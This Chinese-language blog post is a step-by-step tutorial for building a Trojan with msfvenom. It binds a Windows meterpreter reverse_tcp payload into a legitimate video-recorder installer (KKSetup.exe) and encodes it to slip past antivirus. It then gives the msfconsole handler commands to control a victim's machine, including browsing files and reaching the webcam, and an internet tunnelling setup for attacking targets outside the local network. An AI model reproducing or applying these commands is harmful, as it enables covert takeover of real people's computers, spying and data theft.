kali linux——msfvenom生成伪装木马控制计算机

目录

一、攻击过程

1、木马文件生成

2、使用handler模块

3、设置PAYLOAD

4、查看设置

5、设置

6、开始监听

二、验证结果

1、目标机器显示为正常的KK录像机安装文件

2、目标打开软件,攻击者后台获得相应控制权,图为查看目标C盘内容

3、如果希望控制目标摄像头,可以用到webcat

三、内网穿透操作

1、先注册花生壳并下载花生壳客户端

2、点击内网穿透,设置映射

3、生成木马

4、配置msfconsole

四、免杀处理操作

1、待更!


一、攻击过程

前提:局域网内后门生成,因为没做免杀处理,测试需要关闭杀毒软件,外网攻击需要用到内网穿透已更,还可以利用fluxion进行wifi钓鱼,前提网卡必须支持。

1、木马文件生成

msfvenom  -p  windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai       -i 5 -b '0x00' LHOST=192.168.191.4 LPORT=4444 -x KKSetup.exe  -k -f exe -o KKSetup.exe

-p    根据对应的载荷payload生成对应平台下的后门

-e    编码免杀

-i    编码次数

-x|-k    伪装在哪个正常软件上

-o    输出的位置和文件名

lhost&lport    攻击者的ip和端口

进入后台msfconsole

2、使用handler模块

     use exploit/multi/handler

3、设置PAYLOAD

      set PAYLOAD windows/meterpreter/reverse_tcp

4、查看设置

      show options

5、设置

      set lhost xxxx

      set lport xxxx

6、开始监听

      exploit

二、验证结果

1、目标机器显示为正常的KK录像机安装文件

 

2、目标打开软件,攻击者后台获得相应控制权,图为查看目标C盘内容

3、如果希望控制目标摄像头,可以用到webcat

三、内网穿透操作

1、先注册花生壳并下载花生壳客户端

如果需要用到内网映射生成外网木马

生成木马时lhost和lport填写花生壳ip地址端口

2、点击内网穿透,设置映射

内网为你kali的ip地址,端口为5555设置与生成木马时一至即可

点击提交即可。

3、生成木马

在生成木马时,我们需要花生壳ip端口
点击诊断,即可查看花生壳的ip
花生壳的端口:
域名后面的,即为花生壳的端口

4、配置msfconsole

需要注意的是,在配置msfconsole时,我们不能配置花生壳的端口和ip,应该是我们kali本机的ip和端口。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.169.xxx.xxx
set LPORT 5555

5、验证

手机断开局域网,切换至流量,打开木马文件,攻击端获得控制权,如无反应确认是否被杀软拦截

四、免杀处理操作

1、待更!

 

 

发布了64 篇原创文章 · 获赞 9 · 访问量 3万+

猜你喜欢

转载自blog.csdn.net/weixin_39855998/article/details/95202566